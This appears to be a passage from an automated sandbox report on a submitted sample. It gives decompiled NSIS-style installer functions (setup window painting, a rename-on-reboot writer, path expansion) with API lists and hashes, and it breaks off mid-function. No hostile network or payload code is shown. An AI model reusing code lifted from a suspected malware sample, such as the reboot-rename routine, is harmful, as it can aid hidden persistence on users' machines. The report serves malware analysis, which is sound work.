                                                                                    • SendMessageA.USER32(00000000), ref: 0040445E
                                                                                    • GetDlgItem.USER32 ref: 00404489
                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                                                    • LoadCursorA.USER32 ref: 004044D8
                                                                                    • SetCursor.USER32(00000000), ref: 004044E1
                                                                                    • LoadCursorA.USER32 ref: 004044F7
                                                                                    • SetCursor.USER32(00000000), ref: 004044FA
                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                    • String ID: N$uvlcopdlxoed
                                                                                    • API String ID: 3103080414-3108259567
                                                                                    • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                                    • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                                    • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                                    • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 90%
                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                    				struct tagLOGBRUSH _v16;
                                                                                    				struct tagRECT _v32;
                                                                                    				struct tagPAINTSTRUCT _v96;
                                                                                    				struct HDC__* _t70;
                                                                                    				struct HBRUSH__* _t87;
                                                                                    				struct HFONT__* _t94;
                                                                                    				long _t102;
                                                                                    				signed int _t126;
                                                                                    				struct HDC__* _t128;
                                                                                    				intOrPtr _t130;
                                                                                    
                                                                                    				if(_a8 == 0xf) {
                                                                                    					_t130 =  *0x42f434;
                                                                                    					_t70 = BeginPaint(_a4,  &_v96);
                                                                                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                    					_a8 = _t70;
                                                                                    					GetClientRect(_a4,  &_v32);
                                                                                    					_t126 = _v32.bottom;
                                                                                    					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                    					while(_v32.top < _t126) {
                                                                                    						_a12 = _t126 - _v32.top;
                                                                                    						asm("cdq");
                                                                                    						asm("cdq");
                                                                                    						asm("cdq");
                                                                                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                    						_t87 = CreateBrushIndirect( &_v16);
                                                                                    						_v32.bottom = _v32.bottom + 4;
                                                                                    						_a16 = _t87;
                                                                                    						FillRect(_a8,  &_v32, _t87);
                                                                                    						DeleteObject(_a16);
                                                                                    						_v32.top = _v32.top + 4;
                                                                                    					}
                                                                                    					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                    						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                    						_a16 = _t94;
                                                                                    						if(_t94 != 0) {
                                                                                    							_t128 = _a8;
                                                                                    							_v32.left = 0x10;
                                                                                    							_v32.top = 8;
                                                                                    							SetBkMode(_t128, 1);
                                                                                    							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                    							_a8 = SelectObject(_t128, _a16);
                                                                                    							DrawTextA(_t128, "arability Setup", 0xffffffff,  &_v32, 0x820);
                                                                                    							SelectObject(_t128, _a8);
                                                                                    							DeleteObject(_a16);
                                                                                    						}
                                                                                    					}
                                                                                    					EndPaint(_a4,  &_v96);
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t102 = _a16;
                                                                                    				if(_a8 == 0x46) {
                                                                                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                    					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
                                                                                    				}
                                                                                    				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                    			}

                                                                                    APIs
                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextA.USER32(00000000,arability Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F$arability Setup
                                                                                    • API String ID: 941294808-1935799845
                                                                                    • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                                    • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                                    • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                                    • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405D66(void* __ecx) {
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				long _t12;
                                                                                    				long _t24;
                                                                                    				char* _t31;
                                                                                    				int _t37;
                                                                                    				void* _t38;
                                                                                    				intOrPtr* _t39;
                                                                                    				long _t42;
                                                                                    				CHAR* _t44;
                                                                                    				void* _t46;
                                                                                    				void* _t48;
                                                                                    				void* _t49;
                                                                                    				void* _t52;
                                                                                    				void* _t53;
                                                                                    
                                                                                    				_t38 = __ecx;
                                                                                    				_t44 =  *(_t52 + 0x14);
                                                                                    				 *0x42c620 = 0x4c554e;
                                                                                    				if(_t44 == 0) {
                                                                                    					L3:
                                                                                    					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
                                                                                    					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                    						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
                                                                                    						_t53 = _t52 + 0x10;
                                                                                    						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
                                                                                    						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
                                                                                    						_t48 = _t12;
                                                                                    						 *(_t53 + 0x18) = _t48;
                                                                                    						if(_t48 != 0xffffffff) {
                                                                                    							_t42 = GetFileSize(_t48, 0);
                                                                                    							_t6 = _t37 + 0xa; // 0xa
                                                                                    							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                    							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
                                                                                    								L18:
                                                                                    								return CloseHandle(_t48);
                                                                                    							} else {
                                                                                    								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                    									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
                                                                                    									if(_t49 == 0) {
                                                                                    										_t48 =  *(_t53 + 0x18);
                                                                                    										L16:
                                                                                    										_t24 = _t42;
                                                                                    										L17:
                                                                                    										E00405C4B(_t24 + _t46, 0x42c220, _t37);
                                                                                    										SetFilePointer(_t48, 0, 0, 0);
                                                                                    										E00405D37(_t48, _t46, _t42 + _t37);
                                                                                    										GlobalFree(_t46);
                                                                                    										goto L18;
                                                                                    									}
                                                                                    									_t39 = _t46 + _t42;
                                                                                    									_t31 = _t39 + _t37;
                                                                                    									while(_t39 > _t49) {
                                                                                    										 *_t31 =  *_t39;
                                                                                    										_t31 = _t31 - 1;
                                                                                    										_t39 = _t39 - 1;
                                                                                    									}
                                                                                    									_t24 = _t49 - _t46 + 1;
                                                                                    									_t48 =  *(_t53 + 0x18);
                                                                                    									goto L17;
                                                                                    								}
                                                                                    								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                    								_t42 = _t42 + 0xa;
                                                                                    								goto L16;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					CloseHandle(E00405C90(_t44, 0, 1));
                                                                                    					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
                                                                                    					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                    						goto L3;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t12;
                                                                                    			}




















                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                                    • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                                      • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                                      • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                                    • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                                                    • wsprintfA.USER32 ref: 00405DDB
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                                    • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                                    • GlobalFree.KERNEL32 ref: 00405EC4
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                                      • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405C94
                                                                                      • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %s=%s$[Rename]
                                                                                    • API String ID: 2171350718-1727408572
                                                                                    • Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                                                    • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                                    • Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                                                    • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 72%
                                                                                    			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                    				struct _ITEMIDLIST* _v8;
                                                                                    				char _v12;
                                                                                    				signed int _v16;
                                                                                    				signed char _v20;
                                                                                    				signed int _v24;
                                                                                    				signed char _v28;
                                                                                    				signed int _t38;
                                                                                    				CHAR* _t39;
                                                                                    				signed int _t41;
                                                                                    				char _t52;
                                                                                    				char _t53;
                                                                                    				char _t55;
                                                                                    				char _t57;
                                                                                    				void* _t65;
                                                                                    				char* _t66;
                                                                                    				signed int _t80;
                                                                                    				intOrPtr _t86;
                                                                                    				char _t88;
                                                                                    				void* _t89;
                                                                                    				CHAR* _t90;
                                                                                    				void* _t92;
                                                                                    				signed int _t97;
                                                                                    				signed int _t99;
                                                                                    				void* _t100;
                                                                                    
                                                                                    				_t92 = __esi;
                                                                                    				_t89 = __edi;
                                                                                    				_t65 = __ebx;
                                                                                    				_t38 = _a8;
                                                                                    				if(_t38 < 0) {
                                                                                    					_t86 =  *0x42ebfc; // 0x63d143
                                                                                    					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                                                    				}
                                                                                    				_push(_t65);
                                                                                    				_push(_t92);
                                                                                    				_push(_t89);
                                                                                    				_t66 = _t38 +  *0x42f478;
                                                                                    				_t39 = 0x42e3c0;
                                                                                    				_t90 = 0x42e3c0;
                                                                                    				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
                                                                                    					_t90 = _a4;
                                                                                    					_a4 = _a4 & 0x00000000;
                                                                                    				}
                                                                                    				while(1) {
                                                                                    					_t88 =  *_t66;
                                                                                    					if(_t88 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags = _t90 - _t39 - 0x400;
                                                                                    					if(_t90 - _t39 >= 0x400) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_t66 = _t66 + 1;
                                                                                    					__eflags = _t88 - 4;
                                                                                    					_a8 = _t66;
                                                                                    					if(__eflags >= 0) {
                                                                                    						if(__eflags != 0) {
                                                                                    							 *_t90 = _t88;
                                                                                    							_t90 =  &(_t90[1]);
                                                                                    							__eflags = _t90;
                                                                                    						} else {
                                                                                    							 *_t90 =  *_t66;
                                                                                    							_t90 =  &(_t90[1]);
                                                                                    							_t66 = _t66 + 1;
                                                                                    						}
                                                                                    						continue;
                                                                                    					}
                                                                                    					_t41 =  *((char*)(_t66 + 1));
                                                                                    					_t80 =  *_t66;
                                                                                    					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                                                    					_v24 = _t80;
                                                                                    					_v28 = _t80 | 0x00000080;
                                                                                    					_v16 = _t41;
                                                                                    					_v20 = _t41 | 0x00000080;
                                                                                    					_t66 = _a8 + 2;
                                                                                    					__eflags = _t88 - 2;
                                                                                    					if(_t88 != 2) {
                                                                                    						__eflags = _t88 - 3;
                                                                                    						if(_t88 != 3) {
                                                                                    							__eflags = _t88 - 1;
                                                                                    							if(_t88 == 1) {
                                                                                    								__eflags = (_t41 | 0xffffffff) - _t97;
                                                                                    								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                                                    							}
                                                                                    							L42:
                                                                                    							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                                                    							_t39 = 0x42e3c0;
                                                                                    							continue;
                                                                                    						}
                                                                                    						__eflags = _t97 - 0x1d;
                                                                                    						if(_t97 != 0x1d) {
                                                                                    							__eflags = (_t97 << 0xa) + 0x430000;
                                                                                    							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
                                                                                    						} else {
                                                                                    							E00406055(_t90,  *0x42f428);
                                                                                    						}
                                                                                    						__eflags = _t97 + 0xffffffeb - 7;
                                                                                    						if(_t97 + 0xffffffeb < 7) {
                                                                                    							L33:
                                                                                    							E004063D2(_t90);
                                                                                    						}
                                                                                    						goto L42;
                                                                                    					}
                                                                                    					_t52 =  *0x42f42c;
                                                                                    					__eflags = _t52;
                                                                                    					_t99 = 2;
                                                                                    					if(_t52 >= 0) {
                                                                                    						L13:
                                                                                    						_a8 = 1;
                                                                                    						L14:
                                                                                    						__eflags =  *0x42f4c4;
                                                                                    						if( *0x42f4c4 != 0) {
                                                                                    							_t99 = 4;
                                                                                    						}
                                                                                    						__eflags = _t80;
                                                                                    						if(__eflags >= 0) {
                                                                                    							__eflags = _t80 - 0x25;
                                                                                    							if(_t80 != 0x25) {
                                                                                    								__eflags = _t80 - 0x24;
                                                                                    								if(_t80 == 0x24) {
                                                                                    									GetWindowsDirectoryA(_t90, 0x400);
                                                                                    									_t99 = 0;
                                                                                    								}
                                                                                    								while(1) {
                                                                                    									__eflags = _t99;
                                                                                    									if(_t99 == 0) {
                                                                                    										goto L30;
                                                                                    									}
                                                                                    									_t53 =  *0x42f424;
                                                                                    									_t99 = _t99 - 1;
                                                                                    									__eflags = _t53;
                                                                                    									if(_t53 == 0) {
                                                                                    										L26:
                                                                                    										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                                                    										__eflags = _t55;
                                                                                    										if(_t55 != 0) {
                                                                                    											L28:
                                                                                    											 *_t90 =  *_t90 & 0x00000000;
                                                                                    											__eflags =  *_t90;
                                                                                    											continue;
                                                                                    										}
                                                                                    										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                                                    										_v12 = _t55;
                                                                                    										__imp__CoTaskMemFree(_v8);
                                                                                    										__eflags = _v12;
                                                                                    										if(_v12 != 0) {
                                                                                    											goto L30;
                                                                                    										}
                                                                                    										goto L28;
                                                                                    									}
                                                                                    									__eflags = _a8;
                                                                                    									if(_a8 == 0) {
                                                                                    										goto L26;
                                                                                    									}
                                                                                    									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                                                    									__eflags = _t57;
                                                                                    									if(_t57 == 0) {
                                                                                    										goto L30;
                                                                                    									}
                                                                                    									goto L26;
                                                                                    								}
                                                                                    								goto L30;
                                                                                    							}
                                                                                    							GetSystemDirectoryA(_t90, 0x400);
                                                                                    							goto L30;
                                                                                    						} else {
                                                                                    							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
                                                                                    							__eflags =  *_t90;
                                                                                    							if( *_t90 != 0) {
                                                                                    								L31:
                                                                                    								__eflags = _v16 - 0x1a;
                                                                                    								if(_v16 == 0x1a) {
                                                                                    									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                    								}
                                                                                    								goto L33;
                                                                                    							}
                                                                                    							E0040618A(_t66, _t90, _t99, _t90, _v16);
                                                                                    							L30:
                                                                                    							__eflags =  *_t90;
                                                                                    							if( *_t90 == 0) {
                                                                                    								goto L33;
                                                                                    							}
                                                                                    							goto L31;
                                                                                    						}
                                                                                    					}
                                                                                    					__eflags = _t52 - 0x5a04;
                                                                                    					if(_t52 == 0x5a04) {
                                                                                    						goto L13;
                                                                                    					}
                                                                                    					__eflags = _v16 - 0x23;
                                                                                    					if(_v16 == 0x23) {
                                                                                    						goto L13;
                                                                                    					}
                                                                                    					__eflags = _v16 - 0x2e;
                                                                                    					if(_v16 == 0x2e) {
                                                                                    						goto L13;
                                                                                    					} else {
                                                                                    						_a8 = _a8 & 0x00000000;
                                                                                    						goto L14;
                                                                                    					}
                                                                                    				}
                                                                                    				 *_t90 =  *_t90 & 0x00000000;
                                                                                    				if(_a4 == 0) {
                                                                                    					return _t39;
                                                                                    				}
                                                                                    				return E004060F7(_a4, _t39);
                                                                                    			}




























                                                                                    APIs
                                                                                    • GetSystemDirectoryA.KERNEL32(uvlcopdlxoed,00000400), ref: 004062B5
                                                                                    • GetWindowsDirectoryA.KERNEL32(uvlcopdlxoed,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405256,73BCEA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                                    • SHGetPathFromIDListA.SHELL32(73BCEA30,uvlcopdlxoed), ref: 00406312
                                                                                    • CoTaskMemFree.OLE32(73BCEA30), ref: 0040631E
                                                                                    • lstrcatA.KERNEL32(uvlcopdlxoed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                                    • lstrlenA.KERNEL32(uvlcopdlxoed,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00422448,73BCEA30), ref: 00406394
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$uvlcopdlxoed
                                                                                    • API String ID: 717251189-2520582795
                                                                                    • Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                                    • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                                    • Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                                    • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004063D2(CHAR* _a4) {
                                                                                    				char _t5;
                                                                                    				char _t7;
                                                                                    				char* _t15;
                                                                                    				char* _t16;
                                                                                    				CHAR* _t17;
                                                                                    
                                                                                    				_t17 = _a4;
                                                                                    				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                    					_t17 =  &(_t17[4]);
                                                                                    				}
                                                                                    				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
                                                                                    					_t17 =  &(_t17[2]);
                                                                                    				}
                                                                                    				_t5 =  *_t17;
                                                                                    				_t15 = _t17;
                                                                                    				_t16 = _t17;
                                                                                    				if(_t5 != 0) {
                                                                                    					do {
                                                                                    						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
                                                                                    							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                    							_t16 = CharNextA(_t16);
                                                                                    						}
                                                                                    						_t17 = CharNextA(_t17);
                                                                                    						_t5 =  *_t17;
                                                                                    					} while (_t5 != 0);
                                                                                    				}
                                                                                    				 *_t16 =  *_t16 & 0x00000000;
                                                                                    				while(1) {
                                                                                    					_t16 = CharPrevA(_t15, _t16);
                                                                                    					_t7 =  *_t16;
                                                                                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                    						break;
                                                                                    					}
                                                                                    					 *_t16 =  *_t16 & 0x00000000;
                                                                                    					if(_t15 < _t16) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					break;
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}









                                                                                    APIs
                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                                    • CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                                    Strings
                                                                                    • *?|<>/":, xrefs: 0040641A
                                                                                    • "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" , xrefs: 0040640E
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-2017582416
                                                                                    • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                    • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                                    • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                    • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                    				struct tagLOGBRUSH _v16;
                                                                                    				long _t39;
                                                                                    				long _t41;
                                                                                    				void* _t44;
                                                                                    				signed char _t50;
                                                                                    				long* _t54;
                                                                                    
                                                                                    				if(_a4 + 0xfffffecd > 5) {
                                                                                    					L18:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                    				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                    					goto L18;
                                                                                    				} else {
                                                                                    					_t50 = _t54[5];
                                                                                    					if((_t50 & 0xffffffe0) != 0) {
                                                                                    						goto L18;
                                                                                    					}
                                                                                    					_t39 =  *_t54;
                                                                                    					if((_t50 & 0x00000002) != 0) {
                                                                                    						_t39 = GetSysColor(_t39);
                                                                                    					}
